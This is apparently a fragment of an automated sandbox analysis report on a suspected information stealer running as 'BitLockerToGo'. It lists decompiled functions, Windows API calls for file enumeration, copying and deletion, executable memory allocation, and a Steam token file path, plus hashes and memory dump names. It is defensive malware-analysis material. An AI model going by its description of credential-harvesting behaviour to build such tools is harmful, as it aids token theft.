                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                                                                                                                                                          • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 502913869-3507145866
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e98ff91e6a8252b7e587147751582d729b064ed1edeb1d2e9b5778657d059fc3
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ae32e49f5b11d91a8496c6edb966f8384984dd025d61e677e79a1b8da5fe1efd
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e98ff91e6a8252b7e587147751582d729b064ed1edeb1d2e9b5778657d059fc3
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1601DE71D801196B9F00FBB5EE869CEBB7AAE00350B504561EE0463155DF31AA598AD1
                                                                                                                                                                                                                                                                                                                                                          Function 02A10927 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Exception@8Throwmalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3608276449-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c3f80c467f6f68fd325d0379da77ae5848230c75942ce1978e3b8327b98706ce
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 367ad366768a8d4f717eab791a1f3bd7cab1d390578fb5cebb01d2e781f6eb72
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3f80c467f6f68fd325d0379da77ae5848230c75942ce1978e3b8327b98706ce
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5D05E30A40306B7EF106B79ED59489BB2AAA007B87104321BD15E60D4DF70D5928DC5
                                                                                                                                                                                                                                                                                                                                                          Function 02A1807F Relevance: 2.6, APIs: 2, Instructions: 101stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A180C7
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A180E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17D67
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindFirstFileA.KERNEL32(?,?), ref: 02A17D7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A37AF4), ref: 02A17D9F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A37AF8), ref: 02A17DB9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17DE0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A376B6), ref: 02A17DF4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17E11
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: PathMatchSpecA.SHLWAPI(?,?), ref: 02A17E3E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?), ref: 02A17E74
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,02A37B10), ref: 02A17E86
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,?), ref: 02A17E99
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,02A37B14), ref: 02A17EAB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,?), ref: 02A17EBF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17E28
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: CopyFileA.KERNEL32(?,?,00000001), ref: 02A17F78
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: DeleteFileA.KERNEL32(?), ref: 02A17FEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindNextFileA.KERNEL32(?,?), ref: 02A1804E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindClose.KERNEL32(?), ref: 02A18062
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2104210347-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2ee6e3a55b72077ec217b3887dc129cff92935e921ed869b781d12a53d60c3bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 357e1e00768aad38eb88076a1ffa7215604c340809530add749bdeed54b0ede6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ee6e3a55b72077ec217b3887dc129cff92935e921ed869b781d12a53d60c3bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E231B9B5C8010CAFDF06EB94ED42EE9B7FBFB08314F080895A60953250DE719EA59F51
                                                                                                                                                                                                                                                                                                                                                          Function 02A07728 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,02A07B48,?,?), ref: 02A0777A
                                                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02A077A4
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fe8edca09064c2743cfbed4f5a376899ed3bfa80a85cebc9871a8db5f1bdce19
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b8d34c89bdb9966dfd874cad52b736621a2ba3e742480cb963c3a36dc88c2a5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8edca09064c2743cfbed4f5a376899ed3bfa80a85cebc9871a8db5f1bdce19
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C711A975A40705EBC724CFB8DDC5FAAFBF8AB41758F20492DE61AD6280DB70B940CA10
                                                                                                                                                                                                                                                                                                                                                          Function 02A19C8D Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 10514dcddf4e63c0444417fcd2d580286199579d6c23016d22a1f3f1132782a7
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0c3e28c88482ababc4d51c7eab491909ca90b9df8856ac090c1799141822a9bb
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10514dcddf4e63c0444417fcd2d580286199579d6c23016d22a1f3f1132782a7
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D5190F1C50302AFDF217BFE96E8BB2F5E6AF64338B140456A0448A175DF219A40CE65
                                                                                                                                                                                                                                                                                                                                                          Function 02A07B02 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8ed8d6aef4f60cd7605bcc1c75d0bec457b69e3204aee39a184c565d054ed928
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e1132b43ac2ab1c0c327dfa0b23eea34f97000f4cfbe7981aa79db80bb7e3bda
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed8d6aef4f60cd7605bcc1c75d0bec457b69e3204aee39a184c565d054ed928
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4314B71A406149FCF1ADF59EDC09ADFBB2EF84310B24459AD411AB290DF30BA40CED0
                                                                                                                                                                                                                                                                                                                                                          Function 02A13A18 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f5b8d1ee785cdd62108327b2b0add9dc31fca54b6a50b45abf340f45484882d3
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b37437e66670152551f0311791a4729b41b73f7d411aae782f07e91e44feaf67
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5b8d1ee785cdd62108327b2b0add9dc31fca54b6a50b45abf340f45484882d3
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF0DA71E5016DABDB15DF68DD50AAEB7FDEB48310F0045B6B909D3280DA709F458F90
                                                                                                                                                                                                                                                                                                                                                          Function 02A139EE Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,?,02A0EA72,?,?,?), ref: 02A139F5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 977348715d1f4c07d5dd7739127a4cfa33f896429ebba3763e7acf4b033277cb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7533a9f5d5401ffcfade892f32b8fa9cf5a4ccbbcb1bb17b18d48507dcb6f68e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 977348715d1f4c07d5dd7739127a4cfa33f896429ebba3763e7acf4b033277cb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72D05E355401285B4E101EADEC485ABBE68DB017B47004760FD59960E0DB229C6286C0
                                                                                                                                                                                                                                                                                                                                                          Function 02A14387 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SHFileOperation.SHELL32(?), ref: 02A143BD
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
